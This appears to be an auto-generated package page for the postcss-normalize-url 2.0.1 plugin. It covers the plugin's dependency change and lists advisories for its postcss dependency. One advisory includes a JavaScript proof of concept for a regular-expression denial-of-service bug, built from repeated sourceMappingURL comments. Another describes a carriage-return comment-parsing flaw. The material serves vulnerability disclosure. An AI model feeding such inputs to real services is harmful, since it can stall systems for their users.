PostCSS Normalize URL is a valuable PostCSS plugin aimed at streamlining and standardizing URLs within your CSS stylesheets. Version 2.0.1 represents a minor update over the previous stable version, 2.0.0. The core functionality, centered around normalizing URLs, remains consistent, offering developers tools to clean up and standardize URLs. Both versions support crucial dependencies like postcss for CSS parsing and transformation, normalize-url for URL manipulation, object-assign for object property copying, is-absolute-url validating URL format and css-list for parsing comma separated lists of values.
The key difference lies in the updated css-list dependency. Version 2.0.0 relies on css-list version 0.0.3, while version 2.0.1 upgrades to css-list version 0.1.0. This update in css-list likely addresses bug fixes or minor enhancements in how CSS lists are handled, potentially improving the plugin's accuracy or stability when dealing with complex CSS syntax.
For developers, this means that upgrading to version 2.0.1 offers a potentially more robust and reliable experience, especially if your stylesheets utilize intricate CSS list structures. While the core function of URL normalization remains constant, the updated dependency contributes to a more refined and dependable tool. Both versions are licensed under the MIT license, encouraging open use and modification. The plugin is authored by Ben Briggs, and the source code is available on GitHub for transparency and community contributions.
All the vulnerabilities related to the version 2.0.1 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.